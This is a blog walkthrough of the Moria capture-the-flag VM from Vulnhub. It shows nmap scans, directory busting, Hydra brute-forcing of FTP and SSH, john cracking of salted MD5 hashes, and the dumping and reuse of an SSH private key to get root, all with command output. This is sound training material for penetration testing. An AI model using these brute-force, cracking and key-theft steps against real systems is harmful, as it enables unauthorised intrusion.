Moria CTF VM — Vulnhub.com

It’s been a while since I’ve done any Vulnhub VM’s due to other things taking up my time (keep a look out for a future post explaining what’s been taking up my time) But for this post I am walking through an awesome VM I was beta testing for abatchy. Mate you created a truly fun VM. Great work!! Ok so let’s jump straight in.

After finding the IP address of the VM lets run an nmap scan against it

┌─[root@parrot]─[/home/andrew]
└──╼ #nmap 192.168.1.181 -p- -sV

Starting Nmap 7.40 ( https://nmap.org ) at 2017–03–25 17:04 GMT
Nmap scan report for Moria.home (192.168.1.181)
Host is up (0.00045s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
MAC Address: 00:0C:29:75:EC:A1 (VMware)

Cool so we’ve got a few ports open. A FTP, SSH and a HTTP port. Lets jump straight in and take a look at the web page on the HTTP port.

Wow OK, so it seems like a medieval image of some kind. Googling the text from the image

Ennyn Durin Aran Moria. Pedo Mellon a Minno. Im Narvi hainechant. Celebrimbor o Eregion teithant i thiw hin.

Brings me to a wiki page that gives me the translation as:

The Doors of Durin, Lord of Moria. Speak, friend, and enter. I, Narvi, made them. Celebrimbor of Hollin drew these signs.

(on further reading of the wiki page it mentions that the phase actually has the password in it that would make the doors open
“Gandalf’s translation is correct, but the proper translation of the second sentence, also correct, is “Say ‘friend’ and enter.”)

Cool so if we take the clue from the film then we have a password of — friend or Mellon (which is the Sindarin word for friend) and a possible username of Gandalf

Gandalf : friend
Gandalf : Mellon

It could also be giving me another username of Narvi (the creator of the doors)

Narvi : friend
Narvi : Mellon

The source code gives me the name of the image and that’s it haha.
So OK I now know the image shows the “Gates of Moria”.

Lets download it and see if the image holds any clues using strings or exiftool etc.

Neither of them or running an identify -verbose returned anything at all. I’m going to run Sparta against it and see if it can uncover anything at all!

So again not much returned at all at first glance apart from maybe these points that are worth looking into.

+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.4.16 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

I’ll make a note of these and move onto checking the other ports, and I’m guessing that I’ll have to come back to the HTTP port at some point moving forward.

So lets take a look at the FTP port its running vsftpd 2.0.8
using the curl cmd to pull the — ftp-account DATA from the VM gives me

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #curl — ftp-account DATA 192.168.1.181:21
220 Welcome Balrog!
530 Please login with USER and PASS.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
530 Please login with USER and PASS.

OK, this feels like a step forward a quick Google to find out who Balrog is and it turns out he’s a creature who appears in LOTR so helping to confirm I’m on the right path.
Reading the wiki page for Balrogs tells me that the first one introduced in the story is called Durin’s Bane who they encounter in the mines of MORIA. :-) another good sign.
Time to grab a coffee and read up alittle on Durin’s Bane and see if I can get any clues as to a user name and password from his wiki page.

I decided to use the wiki passage and create a custom word list to use with DIRB so after a quick google to find out the best way to do that I found a page http://tinyurl.com/mnr4zxh which gave me the exact thing I was looking for. So using the command

┌─[root@parrot]─[/home/andrew/Desktop/VulnHub Challenges/Moria]
└──╼ #tr -sc ‘[A-Z][a-z]’ ‘[\012*]’ < Durins\ Bane\ Notes\ from\ Wikipedia | sort | uniq > durins\ wordlist

(Which reads the file input.txt, putting each word onto one line, sort the words alphabetically, and remove any duplicates, saving the file to output.txt)

This is exactly what I needed and gives me a really nice word list to use with Dirb.

SO lets see if we get any hits back on the HTTP 80 port.

┌─[✗]─[root@parrot]─[/home/andrew/Desktop/VulnHub Challenges/Moria]
└──╼ #dirb http://192.168.1.181/ durinswordlist

— — — — — — — — -
DIRB v2.22
By The Dark Raver
— — — — — — — — -

START_TIME: Sat Mar 25 18:39:00 2017
URL_BASE: http://192.168.1.181/
WORDLIST_FILES: durinswordlist

— — — — — — — — -

GENERATED WORDS: 360
— — Scanning URL: http://192.168.1.181/ — —
— — — — — — — — -
END_TIME: Sat Mar 25 18:39:01 2017
DOWNLOADED: 360 — FOUND: 0

Arggghhhh come on, I really thought that would get at least one hit!! OK what now?? Robots.txt? Nope!!

OK let’s go back to basics and just run a DirBuster on the site using the standard word list.

cool at last a step forward, it looks like it found a nested dir at http://192.168.1.181/w/h/i/s/p/e/r/the_abyss/

Lets see what it’s got to hide.

OK so it brings me to a page that simple has text on it, I tried to reload it and to my surprise it changed the text. Here are all the lines it is showing me when I repeatedly reload.

Balin: “Be quiet, the Balrog will hear you!”
Ori:”Will anyone hear us?”
“We will die here..”
“Too loud!”
“Eru! Save us!”
“Knock knock”
Fundin:”That human will never save us!”
Telchar to Thrain:”That human is slow, don’t give up yet”
Oin:”Stop knocking!”
Maeglin:”The Balrog is not around, hurry!”
Nain:”Will the human get the message?”
Dain:”Is that human deaf? Why is it not listening?”
“Is this the end?”

It just seems to keep going on and on. I was looking at each pages source code and they are all just text. OK I need to think about what is going on here, I must be missing something.

Looking at the lines above some of them could be user names and passwords as in:

Balin: “Be quiet, the Balrog will hear you!”
Ori:”Will anyone hear us?”
Fundin:”That human will never save us!”
Oin:”Stop knocking!”
Maeglin:”The Balrog is not around, hurry!”
Nain:”Will the human get the message?”
Dain:”Is that human deaf? Why is it not listening?”

At this point it’s worth a try, So I went about creating custom user name and password lists using all of the names I had found so far and ran them through Hydra with the following results

┌─[✗]─[root@parrot]─[/home/andrew/Desktop/VulnHub Challenges/Moria]
└──╼ #hydra -L usernames -P passwords ftp://192.168.1.181
Hydra v8.3 © 2016 by van Hauser/THC — Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017–03–25 20:09:16
[DATA] max 16 tasks per 1 server, overall 64 tasks, 744 login tries (l:24/p:31), ~0 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 83.00 tries/min, 83 tries in 00:01h, 680 to do in 00:09h, 16 active
[STATUS] 58.00 tries/min, 174 tries in 00:03h, 680 to do in 00:12h, 16 active
[STATUS] 52.43 tries/min, 367 tries in 00:07h, 506 to do in 00:10h, 16 active
[STATUS] 50.42 tries/min, 605 tries in 00:12h, 268 to do in 00:06h, 16 active
[STATUS] 49.41 tries/min, 840 tries in 00:17h, 33 to do in 00:01h, 16 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017–03–25 20:26:47
┌─[root@parrot]─[/home/andrew/Desktop/VulnHub Challenges/Moria]
└──╼ #hydra -L usernames -P passwords ssh://192.168.1.181
Hydra v8.3 © 2016 by van Hauser/THC — Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017–03–25 20:29:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 744 login tries (l:24/p:31), ~0 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 137.00 tries/min, 137 tries in 00:01h, 697 to do in 00:06h, 16 active
[STATUS] 138.67 tries/min, 416 tries in 00:03h, 457 to do in 00:04h, 16 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017–03–25 20:35:59

Damn the two lines from above that I didn't want to see were

1 of 1 target completed, 0 valid passwords found
1 of 1 target completed, 0 valid passwords found

OK, I think I’m really stuck now, I’m going to go back through my notes and see if I’ve missed anything.

After reading back through my notes I remembered that when I curl’d the ftp port at the start I got

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #curl — ftp-account DATA 192.168.1.181:21
220 Welcome Balrog!

So lets run Hydra again but this time using the user name Balrog and my custom password list again.

┌─[✗]─[root@parrot]─[/home/andrew/Desktop/VulnHub Challenges/Moria]
└──╼ #hydra -l Balrog -P passwords ftp://192.168.1.181
Hydra v8.3 © 2016 by van Hauser/THC — Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017–03–27 12:05:49
[DATA] max 16 tasks per 1 server, overall 64 tasks, 31 login tries (l:1/p:31), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.181 login: Balrog password: Mellon
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017–03–27 12:05:54

YES!! I was right earlier when I thought it could be Friend or Mellon

[21][ftp] host: 192.168.1.181 login: Balrog password: Mellon

(INTERESTINGLY I HAD BOTH OF THOSE IN MY CUSTOM USER NAME AND PASSWORD LISTS, NOT SURE WHY IT DIDN'T PICK THEM UP)
I’ll make a note to ask the question in the The WhiteHatters Academy Forum and see if it’s something I did wrong.

Let’s check the SSH port with the same user name and password list.

Hydra (http://www.thc.org/thc-hydra) starting at 2017–03–27 12:05:49
[DATA] max 16 tasks per 1 server, overall 64 tasks, 31 login tries (l:1/p:31), ~0 tries per task
[DATA] attacking service ssh on port 22
[21][ftp] host: 192.168.1.181 login: Balrog password: Mellon
1 of 1 target successfully completed, 1 valid password found

Awesome, so now we have the log in creds for the FTP and SSH ports.

Let’s try to connect to the SSH port first

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #ssh Balrog@192.168.1.181
Balrog@192.168.1.181’s password:
Last failed login: Mon Mar 27 07:06:47 EDT 2017 from 192.168.1.161 on ssh:notty
There were 17 failed login attempts since the last successful login.
Last login: Sun Mar 12 22:39:59 2017

WRONG GATE!

Connection to 192.168.1.181 closed.

Hmmmm OK so a step forward and hit another wall, Its the wrong gate!! Let’s follow this trail for a bit, back to Google I think to see if there is in fact another gate referenced in the story.

There is a second gate referenced in the story called the Great Gates this was in fact the main entrance to Moria and The Doors of Durin were the side entrance.

Ok so what to do with this info (I HAVE NO IDEA AT THIS POINT) I’ll make a note of it and move onto the log into the FTP.

After logging on and taking a little look around, without finding anything juicy really at all. I moved to the /var/www/html dir and found a folder /QlVraKW4fbIkXau9zkAPNGzviT3UKntl/ listed.
Nice this feels like I’m going in the right direction again. Lets jump over to Firefox and see what the page holds.

Bingo, this is looking better. OK so it’s a list of “Prisoners” and their passkeys!!
Looking at the source code of the pages gives me another clue too.

So let’s put them together and do a bit of formatting in order to use it with john

Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84
Oin:727a279d913fba677c490102b135e51e$bQkChe
Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4
Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s
Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7$
Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP
Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr
Thrain:7db5040c351237e8332bfbba757a1019$h8spZR
Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe

— (IT WAS THIS SECTION, THE FORMATTING, THAT STUMPED ME FOR SOOOO LONG. I THINK ALL IN ALL I SPENT A FEW WEEKS ON THIS TASK ON AND OFF!!) —

Let’s save it as a file called moriapasswords.txt and load it into john using the variable of -format=dynamic_6

┌─[root@parrot]─[/home/andrew/Desktop/VulnHub/Moria]
└──╼ #john -form=dynamic_6 moriapasswords.txt
Using default input encoding: UTF-8
Loaded 9 password hashes with 9 different salts (dynamic_6 [md5(md5($p).$s) 128/128 AVX 4x3])
Remaining 8 password hashes with 8 different salts
Press ‘q’ or Ctrl-C to abort, almost any other key for status
flower (Balin)
rainbow (Oin)
spanky (Ori)
fuckoff (Maeglin)
warrior (Nain)
abcdef (Dain)
magic (Telchar)
darkness (Thrain)
hunter2 (Fundin)
Use the “ — show” option to display all of the cracked passwords reliably
Session completed

Cool, so now we have some user names and their cracked hashes lets see if we can use them to log into the SSH port

┌─[root@parrot]─[/home/andrew]
└──╼ #ssh balin@192.168.1.181
balin@192.168.1.181’s password:
Permission denied, please try again.
balin@192.168.1.181’s password:

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #ssh Balin@192.168.1.181
Balin@192.168.1.181’s password:
Permission denied, please try again.
Balin@192.168.1.181’s password:

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #ssh oin@192.168.1.181
oin@192.168.1.181’s password:
Permission denied, please try again.
oin@192.168.1.181’s password:

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #ssh Oin@192.168.1.181
Oin@192.168.1.181’s password:
Permission denied, please try again.
Oin@192.168.1.181’s password:

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #ssh ori@192.168.1.181
ori@192.168.1.181’s password:
Permission denied, please try again.
ori@192.168.1.181’s password:

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #ssh Ori@192.168.1.181
Ori@192.168.1.181’s password:
Last login: Tue May 23 07:32:12 2017 from 192.168.1.182
-bash-4.2$

AWESOME!! We’re in. Lets make this a real shell and then carry on enumerating the box.

┌─[✗]─[root@parrot]─[/home/andrew]
└──╼ #ssh Ori@192.168.1.181
Ori@192.168.1.181’s password:
Last login: Tue May 23 07:32:12 2017 from 192.168.1.182
-bash-4.2$ python -c ‘import pty;pty.spawn(“/bin/bash”)’
bash-4.2$ ls
poem.txt

bash-4.2$ cat poem.txt
Ho! Ho! Ho! to the bottle I go
To heal my heart and drown my woe.
Rain may fall and wind may blow,
And many miles be still to go,
But under a tall tree I will lie,
And let the clouds go sailing by.

PS: Moria will not fall!

That’s a nice little poem but I don't really understand what it means at the moment. I’ll make a note of it and lets move on.

bash-4.2$ ls -la
total 8
drwx — — — 3 Ori notBalrog 55 Mar 12 22:57 .
drwxr-x — -. 4 root notBalrog 32 Mar 14 00:36 ..
-rw — — — — 1 Ori notBalrog 6 May 23 07:32 .bash_history
-rw-r — r — 1 root root 225 Mar 13 23:53 poem.txt
drwx — — — 2 Ori notBalrog 57 Mar 12 22:57 .ssh

Lets check out the other folders on the box

bash-4.2$ cat .bash_history

exit

HMMM ok an empty bash_history lets carry on!

bash-4.2$ cd .ssh/

bash-4.2$ ls
id_rsa id_rsa.pub known_hosts

bash-4.2$ cat id_rsa
— — -BEGIN RSA PRIVATE KEY — — -
MIIEpQIBAAKCAQEAu+OTcbouwWKZ6JRYBJXSIp9c8N/+w/0R7A0s5K1Kj45FBhpA
k0U/eZJIcpZZYUu9a5yfEZFnlUHshVjD12KTvvANIfvTalP0+uGrOSlF/b1tt8Ol

**** output snipped to stop you having to scroll endlessly ****

Qi9hdsABbqPUHrydDePDVsK//E/w6wIt/p2qVp0HAoGBAMOjVCCA9lZqpARLZknw
iwAGymT0xjjErjnw8sIHtwpT68VC/lFYBU63lfcGKOHJS78+NR/ptcXzd5UUzhlh
76rwQXE4FVRLYHOogLXruMRLBniwb1/uCYii8w3IxAxgnEW0osKk5U45C/267L5a
EG5xfRiwK9WH66wk7bzR+xr3AoGAMbFqqyAdTIf4vJTREBPH2vdj3FX4EZ0Z9LcL
C3G6r6HlMVjBWdP1a2KX0r7dbyhl60+EEfP3QJyVsfxNxxqa1FYM7NsQ1HlyLEfi
92i3opjrbVulY7jwSFYMa4+lF5gmKZEqp4cwH7u4OSEoBoN+04cHB01bUCoxlqJG
FLjKcn0CgYEAsKVwN6ED885zyrLQcYDkX4/w2gGW6Mrr0pIFnmQlkfGTqT3wZT09
ZMk2LuYPnowQDczFLmMnCw8HskSTIjUCri7vt/E3haMH7JC6YO7WAaRaJ81k9z10
eIJLNgKU5DxCtdKgGeIwlReZSPBBjU5FGtEhfJsL3n3bNYpfGk7ckug=
— — -END RSA PRIVATE KEY — — -

bash-4.2$ cat id_rsa.pub
ssh-rsa

AAAAB3NzaC1yc2EAAAADAQABAAABAQC745Nxui7BYpnolFgEldIin1zw3/7D/RHsDSzkrUqPjkUGGkCTRT95kkhylllhS71rnJ8RkWeVQeyFWMPXYpO+8A0h+9NqU/T64as5KUX9vW23w6VVBbxuC8AlcaibzzVuxSe7mvgFenRLkcihERLaT0EeQ/tmaSGScLzcP7NOWf/a4e8f+mIDnHdoUoPPc3O8lA0SOf9T2mK+WMBVWu5drRMNgOeN7Gxm0bcK2x719CWPuyqyiyqZTZpcS7TdH+gc36OUyfbCgqJGdR2gI1o17n+VhLuV4xwyXwAjuEQyAldK50EYLIu7MO9tCBGLd04UCzvZhK4b920w2igQcuvh Ori@Prison

bash-4.2$ cat known_hosts
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=

Lets try and connect back to the local host using the id_rsa file

bash-4.2$ ssh -i id_rsa root@127.0.0.1
Last login: Tue Mar 14 23:56:24 2017
[root@Moria ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@Moria ~]#

Wow that was a really cool way of rooting the box, I’ve never seen that before in a VM. Let’s see if we can find the flag now that we are root on the box.

[root@Moria ~]# find / -name “*flag*”
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/ens33/flags
/sys/devices/system/cpu/cpu0/microcode/processor_flags
/sys/devices/virtual/net/lo/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/kernel/debug/tracing/events/xfs/xfs_attr_leaf_clearflag
/sys/kernel/debug/tracing/events/xfs/xfs_attr_leaf_setflag
/sys/kernel/debug/tracing/events/xfs/xfs_attr_leaf_flipflags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/module/scsi_mod/parameters/default_dev_flags
/root/flag.txt
/usr/lib64/samba/libflag-mapping-samba4.so
/usr/lib64/perl5/bits/waitflags.ph

We can see that we have found the flag.txt file listed in the root dir.

[root@Moria ~]# cat /root/flag.txt

“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.”

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn’t so hard, was it?
-Abatchy

Huge thanks to @abatchy for letting me beta test this VM! I got stuck for a long time trying to find the correct format for the john cracking section. But after trying ALOT of different variants I finally got there. Huge thanks for creating such an awesome VM.

I’ll look forward to more from you in the future.